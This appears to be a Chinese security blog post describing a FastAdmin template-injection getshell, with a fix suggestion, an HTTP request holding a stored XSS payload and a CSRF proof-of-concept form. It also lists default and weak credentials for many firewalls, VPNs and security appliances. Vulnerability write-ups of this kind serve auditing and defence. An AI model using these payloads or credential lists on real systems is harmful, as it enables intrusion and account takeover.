三十九、fastadmin前臺getshell+csrf+xss

1.影響版本V1.0.0.20200506_beta2.利用限制/application/config.php檔案中：

    //是否開啟前臺會員中心
    'usercenter'             => true，

即需要開啟會員中心功能為利用前提條件：3.漏洞位置

/application/index/User.php檔案

第58-67行：

 public function _empty($name)
    {
        $data = Hook::listen("user_request_empty", $name);
        foreach ($data as $index => $datum) {
            $this->view->assign($datum);
        }
        return $this->view->fetch('user/' . $name);
    }

此方法中的$name引數可控，可導致fetch模板注入

攻擊者可以利用該突破性擴充套件包含指定的路徑的後門檔案，就可以getshell

3.漏洞驗證

登陸會員中心，在個人資料頁面中修改個人頭像：

抓包後修改圖片資料（滿足圖片頭格式即可）：

記錄下路徑後，成功getshell

修復建議

對傳入進來的$name變數做一下過濾

還存在以下漏洞：1後臺分類管理處存在xss

POST /admin.php/category/add?dialog=1 HTTP/1.1
Host: admin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Origin: http://admin.com
Connection: close
Referer: http://admin.com/admin.php/category/add?dialog=1
Cookie: PHPSESSID=ou6fjfn717lu02rfm9saqguca4; uid=3; token=f824ac8c-ac7b-4979-a89b-b47dd8e79226

row%5Btype%5D=default&row%5Bpid%5D=0&row%5Bname%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&row%5Bnickname%5D=123&row%5Bimage%5D=1&row%5Bkeywords%5D=123&row%5Bdescription%5D=123&row%5Bweigh%5D=0&row%5Bstatus%5D=normal&row%5Bflag%5D%5B%5D=
且存在csrf漏洞<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://admin.com/admin.php/category/add?dialog=1" method="POST">
      <input type="hidden" name="row&#91;type&#93;" value="default" />
      <input type="hidden" name="row&#91;pid&#93;" value="0" />
      <input type="hidden" name="row&#91;name&#93;" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="row&#91;nickname&#93;" value="123" />
      <input type="hidden" name="row&#91;image&#93;" value="1" />
      <input type="hidden" name="row&#91;keywords&#93;" value="123" />
      <input type="hidden" name="row&#91;description&#93;" value="123" />
      <input type="hidden" name="row&#91;weigh&#93;" value="0" />
      <input type="hidden" name="row&#91;status&#93;" value="normal" />
      <input type="hidden" name="row&#91;flag&#93;&#91;&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

一些弱口令字典:
使用範圍不限於系統服務、應用服務、應用程式,可以用這些生成字典對內網資產巡檢。泛微OA預設system賬號: system/systemApache DolphinScheduler: admin/dolphinscheduler1、賬號[email protected]
superadminadmin123xadminsystemadminroot2、密碼$companyName$@2020
$companyName$2020$companyName$123admin12312345678123456adminroot為啥沒寫administrators, 因為上面都是我隨便想出來的,這個我記不住。

安全裝置弱密碼排查列表:

天融信防火牆使用者名稱:superman 密碼:talent天融信防火牆使用者名稱:superman 密碼:talent!23聯想網禦防火牆使用者名稱:admin 密碼:leadsec@7766、administrator、bane@7766深信服防火牆使用者名稱：admin 密碼：admin啟明星辰使用者名稱：admin 密碼：bane@7766 使用者名稱：admin 密碼：admin@123juniper 使用者名稱:netscreen 密碼:netscreenCisco 使用者名稱:admin 密碼:ciscoHuawei 使用者名稱:admin 密碼:Admin@123H3C 使用者名稱:admin 密碼:admin綠盟IPS 使用者名稱: weboper 密碼: weboper網神防火牆GE1 使用者名稱：admin 密碼：firewall深信服VPN：51111埠密碼:delanrecover華為VPN：賬號：root 密碼：mduadmin華為防火牆：admin 密碼:Admin@123 EudemonJuniper防火牆：netscreen netscreen迪普 192.168.0.1 預設的使用者名稱和密碼（admin/admin_default)山石 192.168.1.1 預設的管理賬號為hillstone，密碼為hillstone安恆的明御防火牆 admin/adminadmin某堡壘機 shterm/shterm天融信的vpn test/123456

綠盟安全產品預設密碼排查列表:

IPS入侵防禦系統、SASH運維安全管理系統、SAS安全審計系統、DAS資料庫審計系統、RSAS遠端安全評估系統、WAF WEB應用防護系統

sysauditor/sysauditor

sysmanager/sysmanager

supervisor/supervisor

maintainer/maintainer

webpolicy/webpolicy

sysadmin/sysadmin

conadmin/conadmin

supervis/supervis

webaudit/webaudit

sysadmin/sysadmin

conadmin/nsfocus

weboper/weboper

auditor/auditor

weboper/weboper

nsadmin/nsadmin

admin/nsfocus

admin/admin

shell/shell

護網中的漏洞

七、SANGFOR終端檢測響應平臺-任意使用者登入

三十八、F5負載均衡：cve-2020-5902

三十九、fastadmin前臺getshell+csrf+xss

護網中的漏洞

護網筆記（十二）--程式碼執行漏洞

[護網杯 2018]easy_tornado

三星在其 5G RAN 和核心網中採用紅帽容器化技術

Snmp在企業網中的應用

SNMP在企業網中應用

DHCP在企業網中的應用

HSRP在企業網中的應用（CISCO小凡模擬器）

基於ipsec的***在企業網中的應用

ospf在企業網中的應用

IPsec 在企業網中的應用

高可用性網路在企業網中的應用

騰訊天幕：3+2+N盤活聯動生態，助力企業安全護網

easy_dump from 2018護網杯

BUUCTF[護網杯 2018]easy_tornado

python模板注入_BUUCTF/護網杯 easy_tornado 模板注入

【BUUCTF】---[護網杯 2018]easy_tornado---模板注入

護網筆記（十一）--反序列化

[護網杯 2018]easy_tornado 1

在內網中使用leaflet和leaflet-geoman

護網中的漏洞

七、SANGFOR終端檢測響應平臺-任意使用者登入

三十八、F5負載均衡：cve-2020-5902

三十九、fastadmin前臺getshell+csrf+xss

相關推薦